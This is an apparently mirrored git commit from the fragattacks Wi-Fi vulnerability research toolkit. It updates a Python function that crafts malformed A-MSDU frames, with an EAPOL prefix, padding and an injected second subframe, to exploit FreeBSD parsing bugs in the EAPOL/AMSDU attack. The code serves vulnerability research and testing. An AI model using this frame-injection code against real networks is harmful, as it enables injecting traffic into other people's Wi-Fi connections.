mirror of
https://github.com/vanhoefm/fragattacks.git
synced 2024-11-25 00:38:24 -05:00
fragattacks: updated freebsd_create_eapolmsdu
This commit is contained in:
parent
9e068ad969
commit
75b8ea9c54
@ -39,25 +39,27 @@ def log_level2switch(options):
|
|||||||
elif options.debug >= 1: return ["-d", "-K"]
|
elif options.debug >= 1: return ["-d", "-K"]
|
||||||
return ["-K"]
|
return ["-K"]
|
||||||
|
|
||||||
def freebsd_create_eapolmsdu(src, dst, payload):
|
def freebsd_create_eapolmsdu(src, dst, toinject):
|
||||||
"""
|
"""
|
||||||
FreeBSD doesn't properly parse EAPOL/MSDU frames for some reason.
|
FreeBSD doesn't properly parse A-MSDU frames that start with an
|
||||||
It's unclear why. But this code puts the length and addresses at
|
LLC/SNAP header. This is problematic when performing the EAPOL/AMSDU
|
||||||
the right positions so FreeBSD will parse the A-MSDU frame
|
attack. Details why this happens are unclear. To better understand
|
||||||
successfully, so that we can even attack bad implementations.
|
how the frames are parsed, see docs/freebsd_amsdu_bug.odt
|
||||||
"""
|
"""
|
||||||
|
|
||||||
# EAPOL and source address. I don't think the value "\x00\06" is important
|
# Subframe 1: LLC/SNAP for EAPOL. The X's will be part of the first subframe.
|
||||||
rawmac = bytes.fromhex(src.replace(':', ''))
|
rawmac = bytes.fromhex(src.replace(':', ''))
|
||||||
prefix = raw(LLC()/SNAP()/EAPOL()) + b"\x00\x06" + rawmac
|
prefix = raw(LLC()/SNAP()/EAPOL()) + b"XXXXXXXX"
|
||||||
|
|
||||||
# Length followed by the payload
|
# Subframe 1: content will be the X's (excluding the first 6 bytes). The actual
|
||||||
payload = create_msdu_subframe(src, dst, payload)
|
# ethernet payload length will be payload_len - 16 due to parsing bugs.
|
||||||
payload = prefix + struct.pack(">I", len(payload)) + raw(payload)
|
payload_len = 17
|
||||||
|
total_len = payload_len + 6 + 6 + 2
|
||||||
|
padding_len = 4 - (total_len % 4) if total_len % 4 != 0 else 0
|
||||||
|
payload = prefix + struct.pack(">H", payload_len) + payload_len * b"X" + padding_len * b"Y"
|
||||||
|
|
||||||
# Put the destination MAC address in the "right" place
|
# Subframe 2: we can now append it normally
|
||||||
rawmac = bytes.fromhex(dst.replace(':', ''))
|
payload += raw(create_msdu_subframe(src, dst, toinject))
|
||||||
payload = payload[:16] + rawmac[:4] + payload[20:]
|
|
||||||
|
|
||||||
return payload
|
return payload
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user